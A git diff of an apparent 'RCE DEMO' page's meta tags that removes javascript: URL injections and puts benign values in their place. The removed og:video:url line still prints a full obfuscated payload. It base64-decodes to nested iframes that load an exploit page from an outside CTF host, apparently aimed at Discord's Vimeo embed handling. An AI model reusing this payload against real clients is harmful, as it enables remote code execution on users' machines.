--- a/index.html
+++ b/index.html
@@ -1,7 +1,8 @@
 <!DOCTYPE html>
 <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
-	<meta name="twitter:player" content="https://player.vimeo.com/video/572419548&amp;url=javascript:(function(){console.log('Hello');})();">
+	<meta name="twitter:player" content="https://player.vimeo.com/video/572419548">
 
+    
     <meta property="og:title" content="RCE DEMO">
     <meta property="og:description" content="asdasdf&lt;b&gt;Description&lt;/b&lt;&gt;">
     <meta property="og:type" content="video">
@@ -9,7 +10,7 @@
     <meta property="og:image:type" content="image/jpg">
     <meta property="og:image:width" content="1280">
     <meta property="og:image:height" content="720">
-    <meta property="og:video:url" content="https://player.vimeo.com/video/572419548/login/private?success=x&amp;url=javascript://vimeo.com?f=1%27%250awindow.open(atob(location.search.split(String.fromCharCode(0x26))[2].split(String.fromCharCode(0x3d))[1].substr(5).replace(location.search.split(String.fromCharCode(0x26))[2].split(String.fromCharCode(0x3d))[1].substr(0,5),String.fromCharCode(0x2b)).replace(location.search.split(String.fromCharCode(0x26))[2].split(String.fromCharCode(0x3d))[1].substr(0,5),String.fromCharCode(0x2b))),location.search.split(String.fromCharCode(0x26))[2].split(String.fromCharCode(0x3d))[1].substr(0,5))//&amp;payload=_selfamF2YXNjcmlwdDonPGlmcmFtZSBzcmNkb2M9IjxpZnJhbWUgc3JjPVwnaHR0cHM6Ly9jdGYuczFyMXVzLm5pbmphL2Rpc2NvcmQvZXhwLmh0bWxcJzs_selfPC9pZnJhbWU_selfIj4n">
+    <meta property="og:video:url" content="https://example.com">
     <meta property="og:video:type" content="text/html">
     <meta property="og:video:width" content="1280">
     <meta property="og:video:height" content="720">
